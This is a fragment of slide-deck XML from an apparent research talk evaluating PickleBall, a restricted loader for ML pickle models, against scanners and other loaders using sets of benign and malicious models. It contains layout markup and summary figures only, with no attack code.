      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="896" name="Google Shape;896;p75"/>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897" name="Google Shape;897;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2011925" y="1183850"/>
            <a:ext cx="6198000" cy="1081800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>16 ML Libraries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>that load pickle models.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Represent the at-risk APIs that are compromised by malicious pickle models and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>need to be protected with policies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="898" name="Google Shape;898;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2011925" y="2503050"/>
            <a:ext cx="6198000" cy="937500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>84 malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>models and pickle programs.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Represent all known techniques used by malicious pickle models.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="899" name="Google Shape;899;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2011925" y="3677950"/>
            <a:ext cx="6198000" cy="937500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>252 benign </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>models.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Represent all known techniques used by malicious pickle models.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="900" name="Google Shape;900;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="991325" y="2463397"/>
            <a:ext cx="405000" cy="389700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="12275">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="58875" lIns="58875" spcFirstLastPara="1" rIns="58875" wrap="square" tIns="58875">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="901"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="901" name="Google Shape;901;p75"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="991325" y="2463389"/>
            <a:ext cx="404978" cy="389345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="902" name="Google Shape;902;p75"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1174027" y="2782481"/>
            <a:ext cx="697722" cy="697722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="903" name="Google Shape;903;p75"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1158765" y="3852146"/>
            <a:ext cx="734799" cy="734799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="904" name="Google Shape;904;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952644" y="3649450"/>
            <a:ext cx="426900" cy="410100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="12925">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="61975" lIns="61975" spcFirstLastPara="1" rIns="61975" wrap="square" tIns="61975">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="949"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="905" name="Google Shape;905;p75"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="952644" y="3649450"/>
            <a:ext cx="426490" cy="410036"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="906" name="Google Shape;906;p75" title="pngwing.com.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="858000" y="1361488"/>
            <a:ext cx="726525" cy="726525"/>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10" name="Shape 910"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="911" name="Google Shape;911;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Evaluation: P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Creates Secure and Usable Policies</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="912" name="Google Shape;912;p76"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="913" name="Google Shape;913;p76"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="952500" y="1618725"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{11C30A3B-6D4B-4216-B4AD-653BF54A5768}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1441700"/>
                <a:gridCol w="1157000"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Tool</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Type</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>ProtectAI ModelScan</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Scanner</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="550975">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>ModelTracer</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Scanner</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Weights-Only Unpickler</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Restricted Loader</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>P</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>ICKLE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>B</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>ALL</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Restricted Loader</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="914" name="Google Shape;914;p76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2394200" y="898725"/>
            <a:ext cx="4736100" cy="362700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
